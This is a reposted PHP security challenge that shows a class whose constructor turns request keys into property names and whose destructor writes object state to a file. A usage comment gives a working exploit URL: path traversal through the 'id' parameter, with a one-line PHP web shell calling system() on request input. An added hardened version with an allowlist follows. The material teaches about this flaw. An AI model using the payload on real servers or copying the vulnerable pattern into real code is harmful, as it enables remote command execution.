Reposted from:
Can you spot the vulnerability? #PHP #coding #codechallenge pic.twitter.com/ynKyvIJXvc
— RIPS Technologies (@ripstech) April 5, 2019
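<?php
/*
 * Usage: http://localhost/?id=../tmp/shell.php&lost=<?php system($_REQUEST["cmd"]);?>
 */
class Carrot {
    const EXTERNAL_DIRECTORY = '/tmp/';
    private $id;
    private $lost = 0;
    private $bought = 0;

    public function __construct($input) {
        $this->id = rand(1, 1000);
        // Every request key is used as a property name, so the request can
        // overwrite any property, including the private $id set just above.
        foreach ($input as $field => $count) {
            // Post-increment returns the original value: the raw string is stored.
            $this->$field = $count++;
        }
    }

    public function __destruct() {
        // Both the file name ($id) and the written contents come from object state.
        file_put_contents(
            self::EXTERNAL_DIRECTORY . $this->id,
            var_export(get_object_vars($this), true)
        );
    }
}

$carrot = new Carrot($_GET);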
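A hardened variant of the Carrot class above, as an added example (not part of the original challenge and not RIPS Technologies' reference fix). The names `SafeCarrot` and `ALLOWED_FIELDS` are hypothetical, and it assumes `lost` and `bought` are meant to be non-negative integer counters.

```php
<?php
// Added example: hardened counterpart of the Carrot class (names are hypothetical).
final class SafeCarrot {
    const EXTERNAL_DIRECTORY = '/tmp/';
    // Only these counters may be set from the request; $id is never client-controlled.
    const ALLOWED_FIELDS = ['lost', 'bought'];

    private $id;
    private $lost = 0;
    private $bought = 0;

    public function __construct(array $input) {
        $this->id = random_int(1, 1000);
        // Iterate over the allowlist, not over the request keys.
        foreach (self::ALLOWED_FIELDS as $field) {
            if (!isset($input[$field])) {
                continue;
            }
            // Accept only non-negative integers; arrays and other strings yield false.
            $count = filter_var(
                $input[$field],
                FILTER_VALIDATE_INT,
                ['options' => ['min_range' => 0]]
            );
            if ($count === false) {
                continue; // keep the default of 0 for invalid input
            }
            $this->$field = $count;
        }
    }

    public function __destruct() {
        // $id is a server-generated integer, so the path stays inside the directory,
        // and the exported values are integers only.
        file_put_contents(
            self::EXTERNAL_DIRECTORY . $this->id,
            var_export(get_object_vars($this), true),
            LOCK_EX
        );
    }
}

// Constructed input: an unexpected key, a non-numeric value and one valid counter.
$request = ['id' => '../tmp/shell.php', 'lost' => '<?php ?>', 'bought' => '3'];
$carrot = new SafeCarrot($request); // id stays random, lost stays 0, bought becomes 3
```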
This article was written by lufei; please credit the source when reposting.